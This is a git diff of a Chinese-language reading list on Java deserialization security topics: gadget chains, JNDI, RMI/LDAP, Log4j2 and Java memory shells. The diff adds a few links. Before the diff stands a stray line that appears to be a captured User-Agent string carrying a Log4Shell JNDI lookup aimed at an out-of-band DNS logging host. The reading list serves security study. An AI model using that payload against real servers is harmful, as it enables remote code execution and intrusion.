Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.1rk3.hpdth2.ceye.io/ user} diff --git a/README.md b/README.md index 2fa4a02..bbdd6df 100644 --- a/README.md +++ b/README.md 
@@ -201,7 +201,7 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [Java反序列化之C3P0链 | Drunkbaby's Blog](https://drun1baby.top/2022/10/06/Java反序列化之C3P0链/) c3p0,可以打二次反序列化 -[分析尝试利用tabby挖掘-SpringAOP链 - Potat0w0](https://blog.potatowo.top/2025/03/31/从复现到尝试用tabby挖掘-SpringAOP链/) +[分析尝试利用tabby挖掘-SpringAOP链 - Potat0w0](https://blog.potatowo.top/2025/03/31/从复现到尝试用tabby挖掘-SpringAOP链/) [realworldctf old system复盘(jdk1.4 getter jndi gadget)-先知社区](https://xz.aliyun.com/news/8630) LdapAttribute链 @@ -225,6 +225,8 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [JNDI · 攻击Java Web应用-Java Web安全](https://www.javasec.org/javase/JNDI/#jndi) 里面引用了一篇命名和目录服务基本概念的文章,记得看,对后面理解RMI和LDAP很有帮助,很多东西都会在调试里遇到 +[Log4j2漏洞分析 | 1diot9's Blog](https://1diot9.github.io/2025/12/08/Log4j2漏洞分析/) + =========================快速入门的话,可以先只看上面部分的========================= ## RMI、JRMP、JEP290、LDAP @@ -243,7 +245,7 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 下面整理当时看的部分文章 -### 整合类 +### 综合梳理 [奇安信攻防社区-JAVA JRMP、RMI、JNDI、反序列化漏洞之间的风花雪月](https://forum.butian.net/share/2278) 这个感觉最清楚,底下的参考文章也看看 
@@ -457,14 +459,16 @@ payload缩短这部分内容挺多的,感觉能单独研究了。 =====================快速入门的话,可以先只看上面的几篇文章====================== -[bitterzzZZ/MemoryShellLearn: 分享几个直接可用的内存马,记录一下学习过程中看过的文章](https://github.com/bitterzzZZ/MemoryShellLearn) +[bitterzzZZ/MemoryShellLearn: 分享几个直接可用的内存马,记录一下学习过程中看过的文章](https://github.com/bitterzzZZ/MemoryShellLearn) -[Getshell/Mshell: Memshell-攻防内存马研究](https://github.com/Getshell/Mshell) +[Getshell/Mshell: Memshell-攻防内存马研究](https://github.com/Getshell/Mshell) -[W01fh4cker/LearnJavaMemshellFromZero: 【三万字原创】完全零基础从0到1掌握Java内存马,公众号:追梦信安](https://github.com/W01fh4cker/LearnJavaMemshellFromZero) +[W01fh4cker/LearnJavaMemshellFromZero: 【三万字原创】完全零基础从0到1掌握Java内存马,公众号:追梦信安](https://github.com/W01fh4cker/LearnJavaMemshellFromZero) 上面这三篇都是内存马学习的相关项目,里面有很多优秀的文章和案例代码 +[浅谈 Java Agent 内存马 – 天下大木头](https://wjlshare.com/archives/1582) + [奇安信攻防社区-Solon框架注入内存马](https://forum.butian.net/share/3700) 里面提到的Java Object Searcher值得学习 [c0ny1/java-object-searcher: java内存对象搜索辅助工具](https://github.com/c0ny1/java-object-searcher)